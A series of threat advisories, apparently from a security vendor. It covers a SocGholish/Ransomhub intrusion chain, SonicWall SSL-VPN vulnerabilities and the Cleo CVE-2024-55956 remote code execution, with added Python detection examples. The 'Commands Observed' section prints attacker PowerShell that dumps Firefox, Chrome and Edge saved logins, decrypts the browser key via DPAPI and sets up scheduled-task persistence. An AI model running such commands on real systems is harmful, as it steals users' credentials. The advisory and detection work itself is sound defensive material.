    Aligning with threat intelligence on SocGholish, each of these attacks spanned different industries. An initial access broker targeting a wide variety of sectors, accounting for over half of the observed malware in the last quarter, seems to be teaming up with a young though already notorious ransomware group. As threat actors evolve, details like these help inform detection development and improve security postures. Shortly after observing this last set of alerts, TrendMicro released their report, which documents the same attack chain as it worsened for victims, attributing the escalated activity to Ransomhub Ransomware. Thankfully, customers for whom we observed this activity did not experience this same ending due to either Blumira detections and alerts or layered security controls that were in place.

    Commands Observed

    Outlook Signature File Manipulation:
    "C:\Windows\System32\cmd.exe" /C powershell -Command "Get-ChildItem "$env:APPDATA\Microsoft\Signatures\*.htm" | ForEach-Object {$content = Get-Content -Raw $_.FullName; $updatedContent = $content -replace '', ''; Set-Content -Path $_.FullName -Value $updatedContent}" > "C:\Users\\AppData\Local\Temp\rad862D0.tmp"

    Python Setup and Scheduled Task Creation:
    powershell -c "Expand-Archive -LiteralPath c:\programdata\python3.12.zip -DestinationPath c:\programdata;ls c:\programdata\python3.12"
    "C:\Windows\System32\cmd.exe" /C powershell -c "$randomName='Task_' + ([guid]::NewGuid().ToString().Substring(0,8)); $a=New-ScheduledTaskAction -WorkingDirectory 'c:\programdata\python3.12' -Execute 'pythonw.exe'; $t=New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1); $s=New-ScheduledTaskSettingsSet -DontStopIfGoingOnBatteries -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries; Register-ScheduledTask -TaskName $randomName -Action $a -Trigger $t -Settings $s" > "C:\Users\\AppData\Local\Temp\rad72663.tmp"

    Browser Credential Access:
    "C:\Windows\System32\cmd.exe" /C powershell -c cat \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*\\logins.json\" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
    "C:\Windows\System32\cmd.exe" /C powershell -c ls "C:\Users\\AppData\Local\Google\Chrome\'User Data'\*\'Login Data*'" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
    "C:\Windows\System32\cmd.exe" /C powershell -c ls "C:\Users\\AppData\Local\Microsoft\Edge\'User Data'\*\'Login Data*'" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
    "C:\Windows\System32\cmd.exe" /C powershell -c "$tmp=[System.IO.Path]::GetTempFileName();Get-Content -Raw -Encoding Byte \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" | Set-Content -Encoding Byte $tmp; Write-Output $tmp" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
    "C:\Windows\System32\cmd.exe" /C powershell -c "$tmp=[System.IO.Path]::GetTempFileName();Get-Content -Raw -Encoding Byte \"$env:LOCALAPPDATA\\microsoft\\edge\\User Data\\Default\\Login Data\" | Set-Content -Encoding Byte $tmp; Write-Output $tmp" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
    "C:\Windows\System32\cmd.exe" /C powershell -c "$2=((gc "C:\Users\\AppData\Local\Google\Chrome\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace'\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
    "C:\Windows\System32\cmd.exe" /C powershell -c "$2=((gc "C:\Users\\AppData\Local\Microsoft\Edge\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace'\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
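    The command lines above translate directly into process-creation detection logic. The following is an added example (not Blumira’s rules or code from the post) that evaluates a handful of regex rules derived from those commands against constructed sample events and then correlates distinct rule hits per host; host names and the user "alice" are placeholders.

```python
import re
from collections import defaultdict

# Detection rules derived from the command lines listed under "Commands Observed".
# Every pattern in a rule must match the process command line (case-insensitive).
RULES = {
    # T1555.003: Firefox logins.json or Chromium "Login Data" / "Local State" read from a shell
    "browser_credential_store_read": (r"logins\.json|\\Login Data|\\Local State",),
    # T1555.003: DPAPI-unprotecting the Chromium os_crypt key from PowerShell
    "dpapi_unprotect_powershell": (r"ProtectedData\]::Unprotect", r"encrypted_key"),
    # T1053.005: scheduled task running pythonw.exe unpacked under ProgramData
    "scheduled_task_pythonw_programdata": (r"Register-ScheduledTask", r"pythonw\.exe", r"\\programdata\\"),
    # T1187: rewriting Outlook signature HTML to plant a remote image link
    "outlook_signature_modified": (r"Microsoft\\Signatures\\\*\.htm", r"Set-Content"),
    # output staged into rad<5 hex chars>.tmp under the user's Temp directory
    "rad_tmp_staging": (r"\\Temp\\rad[0-9A-F]{5}\.tmp",),
}


def evaluate(event: dict) -> list:
    """Return one hit per rule that fires on a single process-creation event."""
    cmd = event.get("command_line", "")
    return [
        {"host": event["host"], "rule": name}
        for name, patterns in RULES.items()
        if all(re.search(p, cmd, re.IGNORECASE) for p in patterns)
    ]


def rule_names(event: dict) -> set:
    return {hit["rule"] for hit in evaluate(event)}


def correlate(events, min_distinct_rules: int = 2) -> dict:
    """Hosts on which at least `min_distinct_rules` different rules fired.

    The chain above (task persistence, then browser credential theft) trips
    several rules on one host within minutes; counting distinct rules per host
    separates that from a lone benign match.
    """
    per_host = defaultdict(set)
    for event in events:
        per_host[event["host"]].update(rule_names(event))
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_distinct_rules}


# Constructed sample events, shortened from the observed commands; host names
# and the user "alice" are placeholders, not values from the original logs.
SAMPLE_EVENTS = [
    {"host": "ws01", "command_line": r'"C:\Windows\System32\cmd.exe" /C powershell -c cat "$env:APPDATA\Mozilla\Firefox\Profiles\*\logins.json" > "C:\Users\alice\AppData\Local\Temp\radBB236.tmp"'},
    {"host": "ws01", "command_line": r'"C:\Windows\System32\cmd.exe" /C powershell -c "$a=New-ScheduledTaskAction -WorkingDirectory c:\programdata\python3.12 -Execute pythonw.exe; $t=New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1); Register-ScheduledTask -TaskName $n -Action $a -Trigger $t" > "C:\Users\alice\AppData\Local\Temp\rad72663.tmp"'},
    {"host": "ws01", "command_line": r'"C:\Windows\System32\cmd.exe" /C powershell -c "$k=((gc "C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State").split(",")|sls encrypted_key);[System.Security.Cryptography.ProtectedData]::Unprotect($k,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" > "C:\Users\alice\AppData\Local\Temp\radBB236.tmp"'},
    {"host": "ws01", "command_line": r'"C:\Windows\System32\cmd.exe" /C powershell -Command "Get-ChildItem "$env:APPDATA\Microsoft\Signatures\*.htm" | ForEach-Object {$c = Get-Content -Raw $_.FullName; Set-Content -Path $_.FullName -Value $c}" > "C:\Users\alice\AppData\Local\Temp\rad862D0.tmp"'},
    {"host": "ws02", "command_line": r'"C:\Windows\System32\cmd.exe" /C powershell -c Get-Date'},
]

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE_EVENTS).items():
        print(host, rules)
```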

    MITRE ATT&CK Tactics and Techniques

    Initial Access [TA0001]
    • Drive-by Compromise [T1189]
    Execution [TA0002]
    • Command and Scripting Interpreter [T1059]
      • JavaScript [T1059.007]
    Persistence [TA0003]
    • Scheduled Task/Job [T1053]
      • Scheduled Task [T1053.005]
    Defense Evasion [TA0005] (This was inferred through VirusTotal reputations, not directly observed via malware analysis.)
    • Virtualization/Sandbox Evasion [T1497]
      • Time Based Evasion [T1497.003]
    Credential Access [TA0006]
    • Credentials from Password Stores [T1555]
      • Credentials from Web Browsers [T1555.003]
    • Forced Authentication [T1187]
    Discovery [TA0007]
    • Account Discovery [T1087]
      • Domain Account [T1087.002]
    • System Information Discovery [T1082]
    Command and Control [TA0011]
    • Application Layer Protocol [T1071]
      • Web Protocols [T1071.001]

    IOC list:


    Medium
    January 8, 2025

    SonicWall Vulnerabilities: High Severity Alert

    What Happened

    On January 7th, SonicWall released a product security advisory detailing several vulnerabilities including a high severity flaw in the SSL-VPN authentication mechanism which could allow a remote attacker to bypass authentication. While this vulnerability is the highlight of the advisory, it comes in alongside three others including another SSL-VPN authentication bypass (CVSS 7.1), a privilege escalation vulnerability (CVSS 7.8), and a server-side request vulnerability (CVSS 6.5).


    Additionally, an SSL-VPN MFA Bypass (CVSS 6.5) vulnerability was also disclosed in a separate advisory. This vulnerability is not as high severity as the previously mentioned authentication bypass, but is important to call out due to the heavy reliance on MFA for securing VPN access.


    SonicWall states in their advisory that no active exploitation of these vulnerabilities has been reported but that patching immediately is important to prevent exploitation.

    CVE ID | CVSS | Summary

    CVE-2024-53704 | High - 8.2 | SonicOS SSL-VPN Authentication Bypass Vulnerability
    An Improper Authentication vulnerability in the SSL-VPN authentication mechanism allows a remote attacker to bypass authentication.

    CVE-2024-53706 | High - 7.8 | Local Privilege Escalation Vulnerability
    A vulnerability in the Gen7 SonicOS Cloud platform NSv (AWS and Azure editions only) allows a remote authenticated local low-privileged attacker to elevate privileges to `root` and potentially lead to code execution.

    CVE-2024-40762 | High - 7.1 | Cryptographically Weak Pseudo-Random Number Generator
    Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in the SonicOS SSL-VPN authentication token generator that, in certain cases, can be predicted by an attacker potentially resulting in authentication bypass.

    CVE-2024-53705 | Medium - 6.5 | Server-Side Request Forgery Vulnerability
    A Server-Side Request Forgery vulnerability in the SonicOS SSH management interface allows a remote attacker to establish a TCP connection to an IP address on any port when the user is logged in to the firewall.

    CVE-2024-12802 | Medium - 6.5 | SSL-VPN MFA Bypass
    SSL-VPN MFA Bypass in SonicWALL SSL-VPN can arise in specific cases due to the separate handling of UPN (User Principal Name) and SAM (Security Account Manager) account names when integrated with Microsoft Active Directory, allowing MFA to be configured independently for each login method and potentially enabling attackers to bypass MFA by exploiting the alternative account name.

    What That Means

    Administrators managing virtual or physical SonicWall firewalls should patch immediately. Vulnerabilities affecting these products can allow remote attackers to bypass authentication for SSL-VPN services and allow them direct access to underlying networks.

    When operated correctly, a VPN can allow a remote employee access to internal company networks and resources. The benefits of this service are plain to see, however; in the hands of a malicious actor, VPNs are a valuable target specifically due to the network access that they can provide. While logged in to a company VPN, malicious actors will typically begin scanning and scoping out the network to determine their level of access and identify potential targets for lateral movement and exploitation. Some threat actors may opt to start with data exfiltration, downloading any and all data that is accessible to them to later be used for extortion or sold to the highest bidder (or both).

    Who’s Impacted

    The following list has been directly lifted from the SonicWall Advisory page.

    Vulnerabilities | Affected Platforms and Build Versions

    CVE-2024-53705
    • Gen6 Hardware Firewalls - SOHOW, TZ 300, TZ 300W, TZ 400, TZ 400W, TZ 500, TZ 500W, TZ 600, NSA 2650, NSA 3600, NSA 3650, NSA 4600, NSA 4650, NSA 5600, NSA 5650, NSA 6600, NSA 6650, SM 9200, SM 9250, SM 9400, SM 9450, SM 9600, SM 9650, TZ 300P, TZ 600P, SOHO 250, SOHO 250W, TZ 350, TZ 350W: 6.5.4.15-117n and older versions.
    • Gen7 Firewalls - TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700, NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700: 7.0.x (7.0.1-5161 and older versions).
    • Gen7 NSv - NSv 270, NSv 470, NSv 870: 7.0.x (7.0.1-5161 and older versions).

    CVE-2024-40762, CVE-2024-53704, CVE-2024-53705
    • Gen7 Firewalls - TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700, NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700: 7.1.x (7.1.1-7058 and older versions) and version 7.1.2-7019.
    • Gen7 NSv - NSv 270, NSv 470, NSv 870: 7.1.x (7.1.1-7058 and older versions) and version 7.1.2-7019.
    • TZ80: Version 8.0.0-8035

    CVE-2024-53706
    • Gen7 Cloud platform NSv - NSv 270, NSv 470, NSv 870 (Only AWS and Azure editions are vulnerable): 7.1.x (7.1.1-7058 and older versions) and version 7.1.2-7019

    CVE-2024-12802
    • Gen6 NSv - NSv10, NSv25, NSv50, NSv100, NSv200, NSv300, NSv400, NSv800, NSv1600: 6.5.4.4-44v-21-2457 and older versions
    • Gen6 Firewalls - SOHOW, TZ 300, TZ 300W, TZ 400, TZ 400W, TZ 500, TZ 500W, TZ 600, NSA 2650, NSA 3600, NSA 3650, NSA 4600, NSA 4650, NSA 5600, NSA 5650, NSA 6600, NSA 6650, SM 9200, SM 9250, SM 9400, SM 9450, SM 9600, SM 9650, TZ 300P, TZ 600P, SOHO 250, SOHO 250W, TZ 350, TZ 350W: 6.5.4.15-117n and older versions
    • Gen7 Firewalls - TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSA 2700, NSA 3700, NSA 4700, NSA 5700, NSA 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700; Gen7 NSv - NSV270, NSv470, NSv870 (ESX, KVM, HYPER-V, AWS, Azure): 7.0.1-5161 and older versions; 7.1.1-7058 and older versions; 7.1.2-7019 and older versions
    • TZ80: Version 8.0.0-8035

    How Would I Know and What Should I Do

    At this time, SonicWall has not released any indicators of compromise or any details regarding what to look for to confirm if your systems are being targeted.

    Without specifics around exploitation, administrators should be on the lookout for unusual behavior in their environment, especially anything related to any unpatched SonicWall firewalls. This includes, but is not limited to:

    • Unusual or unexpected login attempts to the admin portal or SSL-VPN
    • Unexpected changes to the configuration of SonicWall devices

    If you suspect your SonicWall firewall has been compromised, you should immediately attempt to contain the incident and establish a scope. In some cases, it may be advisable to disconnect the firewall, recover from a known-good backup, and apply the latest patches before bringing it back online. Also, ensure you rotate any administrator or user account passwords local to the compromised device.
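    The first indicator above, unusual login attempts against the admin portal or SSL-VPN, is what the "5 or More Login Failures in 15 Minutes" logic listed under How Blumira Can Help keys on. As an added example (not Blumira’s detection code), the following sliding-window detector runs over constructed key=value log lines in SonicWall’s syslog style and additionally flags a successful login that arrives from a source still inside a failure burst; serial number, addresses, users and the exact msg wording are placeholders, and real deployments should match on the message IDs their firmware emits.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=15)
THRESHOLD = 5
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(line: str) -> dict:
    """Parse a key=value syslog line into a dict, stripping surrounding quotes."""
    return {key: value.strip('"') for key, value in KV_RE.findall(line)}


def detect(lines, window=WINDOW, threshold=THRESHOLD) -> list:
    """Sliding-window failed-login detector keyed on the source address.

    Fires 'login_failure_burst' when `threshold` failures from one source fall
    inside `window` (once per source), and 'login_success_after_burst' when a
    later successful login arrives from a source still inside such a burst,
    the case where a password-guessing run actually got in.
    """
    recent_failures = defaultdict(deque)  # src -> failure timestamps inside the window
    burst_alerted = set()
    alerts = []
    for line in lines:  # lines are assumed to arrive in time order
        event = parse(line)
        ts = datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")
        src = event.get("src", "unknown")
        msg = event.get("msg", "").lower()
        window_q = recent_failures[src]
        while window_q and ts - window_q[0] > window:
            window_q.popleft()
        if "login failed" in msg:
            window_q.append(ts)
            if len(window_q) >= threshold and src not in burst_alerted:
                burst_alerted.add(src)
                alerts.append({"type": "login_failure_burst", "src": src,
                               "time": ts, "count": len(window_q)})
        elif "login allowed" in msg and len(window_q) >= threshold:
            alerts.append({"type": "login_success_after_burst", "src": src,
                           "time": ts, "user": event.get("usr")})
    return alerts


# Constructed sample lines (placeholders throughout): five failures from one
# source in six minutes, one stray failure from another, then two successes.
SAMPLE_LOGS = [
    'id=sslvpn sn=SERIAL-PLACEHOLDER time="2025-01-08 09:00:10" src=198.51.100.7 usr="jdoe" msg="User login failed"',
    'id=sslvpn sn=SERIAL-PLACEHOLDER time="2025-01-08 09:01:00" src=203.0.113.9 usr="asmith" msg="User login failed"',
    'id=sslvpn sn=SERIAL-PLACEHOLDER time="2025-01-08 09:02:05" src=198.51.100.7 usr="jdoe" msg="User login failed"',
    'id=sslvpn sn=SERIAL-PLACEHOLDER time="2025-01-08 09:03:40" src=198.51.100.7 usr="admin" msg="User login failed"',
    'id=sslvpn sn=SERIAL-PLACEHOLDER time="2025-01-08 09:05:12" src=198.51.100.7 usr="admin" msg="User login failed"',
    'id=sslvpn sn=SERIAL-PLACEHOLDER time="2025-01-08 09:06:01" src=198.51.100.7 usr="admin" msg="User login failed"',
    'id=sslvpn sn=SERIAL-PLACEHOLDER time="2025-01-08 09:07:30" src=198.51.100.7 usr="admin" msg="Administrator login allowed"',
    'id=sslvpn sn=SERIAL-PLACEHOLDER time="2025-01-08 09:30:00" src=203.0.113.9 usr="asmith" msg="User login allowed"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOGS):
        print(alert)
```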

    Workarounds

    Patching is essential to effectively mitigate exposure to these vulnerabilities. However, if you are unable to patch immediately, a workaround may be available.

    If SSL-VPN is not a critical component of regular business operations, temporarily disabling that functionality on your firewall until patches can be applied has been identified as an adequate workaround. Alternatively, refer to the suggestions made by SonicWall in both advisories:

    SNWLID-2025-0003

    To minimize the potential impact of SSL-VPN vulnerabilities, please ensure that access is limited to trusted sources, or disable SSL-VPN access from the Internet. For more information about disabling firewall SSL-VPN access, see: how-can-i-setup-ssl-vpn.

    To minimize the potential impact of an SSH vulnerability, we recommend restricting firewall management to trusted sources or disabling firewall SSH management from Internet access.

    For more information about disabling firewall SSH management access, see: how-can-i-restrict-SonicOS-admin-access

    SNWLID-2025-0001

    To mitigate the SSL-VPN MFA bypass issue in SonicWALL SSL-VPN, modify the LDAP Schema settings to prevent authentication via UPN (User Principal Name). This can be achieved by removing "userPrincipalName" from the "Qualified login name" field in the LDAP configuration.

    This configuration can be accessed by navigating to: Device > Users > Settings > Authentication > Configure LDAP > Edit Primary LDAP Server > Schema.
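    The MFA bypass class described for CVE-2024-12802 comes down to policy being keyed on the literal login string rather than on the account it resolves to. As an added illustration (not SonicWall’s or Blumira’s code), the following contrasts that weak lookup with one keyed on the canonical account, and expresses the advisory’s workaround, dropping userPrincipalName from the qualified login names, as a check; the directory, domain and account names are constructed placeholders.

```python
# Constructed sample directory; "corp.example", "CORP" and the accounts are placeholders.
# The svc-backup entry shows that a UPN prefix need not equal the sAMAccountName.
DOMAIN, NETBIOS = "corp.example", "CORP"
DIRECTORY = {
    "jdoe": {"upn": "jdoe@corp.example", "sam": "jdoe", "mfa_required": True},
    "svc-backup": {"upn": "backup.service@corp.example", "sam": "svc-backup", "mfa_required": True},
}


def canonical_account(login: str):
    """Resolve UPN, NETBIOS\\sam or bare sam to one directory key (None if unknown)."""
    login = login.strip().lower()
    if "\\" in login:
        dom, _, login = login.partition("\\")
        if dom != NETBIOS.lower():
            return None
    for key, record in DIRECTORY.items():
        if login in (record["upn"].lower(), record["sam"].lower()):
            return key
    return None


# Weak model, the pattern the advisory describes: the MFA requirement is keyed on
# the literal login string, so a name form that was never enrolled gets no MFA.
WEAK_MFA_BY_LOGIN = {"jdoe": True, "svc-backup": True}  # only the SAM form was enrolled


def weak_requires_mfa(login: str) -> bool:
    return WEAK_MFA_BY_LOGIN.get(login.strip(), False)


def hardened_requires_mfa(login: str) -> bool:
    """Policy keyed on the resolved account; unknown accounts fail closed."""
    key = canonical_account(login)
    return True if key is None else DIRECTORY[key]["mfa_required"]


def login_form_allowed(login: str, qualified_login_names=("sAMAccountName",)) -> bool:
    """The workaround as a check: a UPN-form login is only accepted when
    userPrincipalName is still among the LDAP 'Qualified login name' attributes."""
    if "@" in login:
        return "userPrincipalName" in qualified_login_names
    return "sAMAccountName" in qualified_login_names


if __name__ == "__main__":
    for form in ("jdoe", "jdoe@corp.example", "CORP\\jdoe"):
        print(form, "weak:", weak_requires_mfa(form), "hardened:", hardened_requires_mfa(form),
              "accepted after workaround:", login_form_allowed(form))
```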

    When Will it Be Fixed?

    Patches are available now and include the following:

    Fixed Platforms | Fixed Versions

    • Gen6 NSv - NSv10, NSv25, NSv50, NSv100, NSv200, NSv300, NSv400, NSv800, NSv1600: 6.5.4.4-44v-21-2472 and higher
    • Gen6 Firewalls - SOHOW, TZ 300, TZ 300W, TZ 400, TZ 400W, TZ 500, TZ 500W, TZ 600, NSA 2650, NSA 3600, NSA 3650, NSA 4600, NSA 4650, NSA 5600, NSA 5650, NSA 6600, NSA 6650, SM 9200, SM 9250, SM 9400, SM 9450, SM 9600, SM 9650, TZ 300P, TZ 600P, SOHO 250, SOHO 250W, TZ 350, TZ 350W: 6.5.5.1-6n and higher
    • Gen7 Firewalls - TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700, NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700; Gen7 NSv - NSV270, NSv470, NSv870 (ESX, KVM, HYPER-V, AWS, Azure): 7.0.1-5165 and higher; 7.1.3-7015 and higher
    • TZ80: 8.0.0-8037 and higher

    How Blumira Can Help

    Blumira’s security team is actively monitoring this issue and exploring methods to detect potential exploitation of these vulnerabilities.

    Several detections and reports are available to our customers and may help reveal possible exploitation of these vulnerabilities or post-exploitation activity:

    Type | Name

    • Detection | SonicWall: 5 or More Login Failures in 15 Minutes
    • Detection (default disabled) | SonicWall: Configuration Change
    • Detection (default disabled) | Sonicwall: Administrator Login Allowed
    • Report | Firewall Configuration Change (SonicWall)
    • Report | IDS/IPS Alerts
    • Report | VPN Connections
    • Report | SonicWall: Administrator Login Allowed

    Critical
    December 17, 2024

    Critical Cleo RCE Vulnerability: CVE-2024-55956 Explained

    On December 9th, Huntress released a threat advisory reporting a vulnerability and active exploitation of the file transfer management software offered by Cleo, a software company known for its ‘ecosystem integration platform’.

    What Happened

    Designated as CVE-2024-55956, exploitation focuses on an unrestricted file upload and download vulnerability that could lead to remote code execution. This vulnerability affects versions prior to 5.8.0.24 of Cleo’s Harmony, VLTrader, and LexiCom software. It’s also important to note that this vulnerability has been confirmed to not require prior authentication before exploitation. Unauthenticated remote code execution vulnerabilities are valuable targets for threat actors because they allow direct system compromise without needing to bypass authentication controls or obtain valid credentials first. Huntress and Rapid7 have both confirmed observations of active exploitation attempts in the wild.


    CVE ID | CVSS | Summary

    CVE-2024-55956 | High - 8.8 | In Cleo Harmony before 5.8.0.24, VLTrader before 5.8.0.24, and LexiCom before 5.8.0.24, an unauthenticated user can import and execute arbitrary Bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory.

    It’s also important to note that there are two CVE IDs attributed to this vulnerability. This may be slightly confusing, so here is a brief explanation.

    • CVE-2024-50623: issued to track the original remote code execution vulnerability disclosed by Cleo in October 2024. The patch released to address this CVE was revealed to be inadequate in preventing exploitation.
    • CVE-2024-55956: issued to track the bypass of the original patch; it is the current CVE used to track these Cleo remote code execution vulnerabilities.

    If you are still unsure or don’t have time to dive into the specifics, just make sure your Cleo software is on 5.8.0.24 or higher. That way, you’re protected from both of these CVEs.

    What That Means

    Administrators managing Harmony, VLTrader, and LexiCom software should patch immediately to version 5.8.0.24 or higher. Vulnerabilities affecting these products can lead to remote code execution and allow an attacker into your network. Additionally, “in the wild” scanning and exploitation of these vulnerabilities has been confirmed by multiple sources.

    Exploitation of this vulnerability allows an attacker to gain a foothold in the network. From there, they may decide to pivot within the network or act more quickly and deploy ransomware right from the initial compromised host. In some confirmed instances of exploitation, defenders have seen attackers move further into the network and attempt to perform domain reconnaissance using tools such as nltest.

    Who’s Impacted

    The following list has been directly lifted from the Cleo Product Security Update for CVE-2024-55956

    • Cleo Harmony® (prior to version 5.8.0.24)
    • Cleo VLTrader® (prior to version 5.8.0.24)
    • Cleo LexiCom® (prior to version 5.8.0.24)

    How Would I Know and What Should I Do

    Several indicators of compromise have been revealed by Huntress researchers:

    File artifacts under your Harmony, VLTrader, or LexiCom installation directory, typically under C:\ or C:\Program Files (x86) - e.g. C:\LexiCom or C:\Program Files (x86)\Lexicom. Several IPs have been associated with confirmed Cleo attacks.

    IoC Type | IoC

    • File Artifact | Autorun\healthchecktemplate.txt
    • File Artifact | Autorun\healthcheck.txt
    • File Artifact | Main.xml
    • File Artifact | 60282967-dc91-40ef-a34c-38e992509c2c.xml


    Huntress researchers have collected examples of these file artifacts and have reported that they contain encoded PowerShell commands. Additionally, there may be a .dbg log file under the logs directory (e.g. C:\LexiCom\logs) that you can review to identify whether any suspicious files have been uploaded to the autorun directory. The Cleo autorun feature and directory appear to be a pivotal component of the exploit chain.

    If you suspect a Cleo instance has been compromised, you should immediately attempt to contain the incident and establish a scope. In some cases, it may be advisable to isolate the Cleo service, recover from a known-good backup, and apply the latest patches before bringing it back online. It is also recommended to rotate any administrator or user account passwords local to any compromised devices.

    Cleo has also offered resources for response and mitigation (behind a login).
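    Since the reported artifacts are both named files in the Autorun directory and carriers of encoded PowerShell, a scan can check for both. The following is an added example (not Huntress’s or Cleo’s tooling) that walks an Autorun directory, flags the artifact names from the IoC list above and decodes any base64/UTF-16LE -EncodedCommand blobs it finds, run here against a constructed temporary fixture with a harmless encoded command.

```python
import base64
import os
import re
import tempfile

# File names Huntress reported in the Cleo Autorun directory (from the IoC list
# above) plus the <uuid>.xml pattern of the fourth artifact.
ARTIFACT_NAMES = {"healthchecktemplate.txt", "healthcheck.txt", "main.xml"}
UUID_XML_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\.xml$", re.I)
# powershell -EncodedCommand and its short forms, followed by a base64 blob
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_powershell(blob: str):
    """Encoded commands are base64 of UTF-16LE text; return the text or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encoded_commands_in(text: str) -> list:
    """Every decodable -EncodedCommand payload found in a piece of text."""
    decoded = []
    for match in ENC_RE.finditer(text):
        command = decode_encoded_powershell(match.group(1))
        if command is not None:
            decoded.append(command)
    return decoded


def scan_autorun(autorun_dir: str) -> list:
    """Flag files by known artifact name and by embedded encoded PowerShell."""
    findings = []
    for name in sorted(os.listdir(autorun_dir)):
        path = os.path.join(autorun_dir, name)
        if not os.path.isfile(path):
            continue
        reasons = []
        if name.lower() in ARTIFACT_NAMES or UUID_XML_RE.match(name):
            reasons.append("known artifact name")
        with open(path, encoding="utf-8", errors="replace") as fh:
            decoded = encoded_commands_in(fh.read())
        if decoded:
            reasons.append("encoded PowerShell")
        if reasons:
            findings.append({"file": name, "reasons": reasons, "decoded": decoded})
    return findings


def build_sample_autorun() -> str:
    """Constructed fixture: a temp dir holding one artifact that carries a
    harmless encoded command and one benign file. Returns the directory path."""
    directory = tempfile.mkdtemp()
    payload = base64.b64encode(
        "Write-Output 'constructed-sample'".encode("utf-16-le")).decode()
    with open(os.path.join(directory, "healthcheck.txt"), "w") as fh:
        fh.write(f"cmd.exe /c powershell -NoP -enc {payload}\n")
    with open(os.path.join(directory, "notes.txt"), "w") as fh:
        fh.write("routine transfer log, nothing encoded\n")
    return directory


if __name__ == "__main__":
    for finding in scan_autorun(build_sample_autorun()):
        print(finding)
```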

    Workarounds

    If you are unable to patch your Cleo instances in a timely manner, consider taking them offline until able to do so or at least disable any public internet access they may have. Additionally, a temporary workaround has been suggested by Huntress to limit the attack surface. They have stated that this workaround will stop execution, but, “will not prevent the arbitrary file-write vulnerability until a patch is released.”

    When Will it be Fixed?

    Patches are available and have been released by Cleo:

    • Cleo Harmony® (version 5.8.0.24 or higher)
    • Cleo VLTrader® (version 5.8.0.24 or higher)
    • Cleo LexiCom® (version 5.8.0.24 or higher)

    How Blumira Can Help

    Blumira’s security team actively monitors this issue and looks for additional ways that we can detect any stage of exploitation of these vulnerabilities.

    Several detections and reports are available to our customers and would help reveal any possible exploitation of these vulnerabilities or post exploitation activity:

    Type                       | Name
    ---------------------------+------------------------------------------------------------------
    Detection                  | Potential Exploitation of Cleo CVE-2024-55956 - Autorun File Artifacts
    Detection                  | Nltest Domain Enumeration
    Detection                  | AdFind Domain Enumeration
    Detection                  | Reconnaissance via Net Commands
    Detection                  | PowerShell: Encoded Command Execution
    Detection (default disabled) | PowerShell: Execution Policy Bypass
    Detection                  | PowerShell: Download Invocation
    Report                     | Windows: Potentially Malicious Powershell

    Critical
    December 12, 2024

    SonicWall Advisory Reveals Two Unauthenticated Remote Code Execution Vulnerabilities

    What Happened

    On December 3, 2024, SonicWall PSIRT (Product Security Incident Response Team) released a security advisory detailing six vulnerabilities in their SMA 100 Series devices (SMA 200, 210, 400, 410, 500v). The reported vulnerabilities range in severity from Medium (5.3 CVSS) to High (8.1 CVSS) with three of the six having remote code execution potential.


    CVE ID         | CVSS         | Summary
    ---------------+--------------+--------------------------------------------------------------
    CVE-2024-53702 | Medium - 5.3 | Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in the SonicWall SMA100 SSLVPN backup code generator that, in certain cases, can be predicted by an attacker, potentially exposing the generated secret.
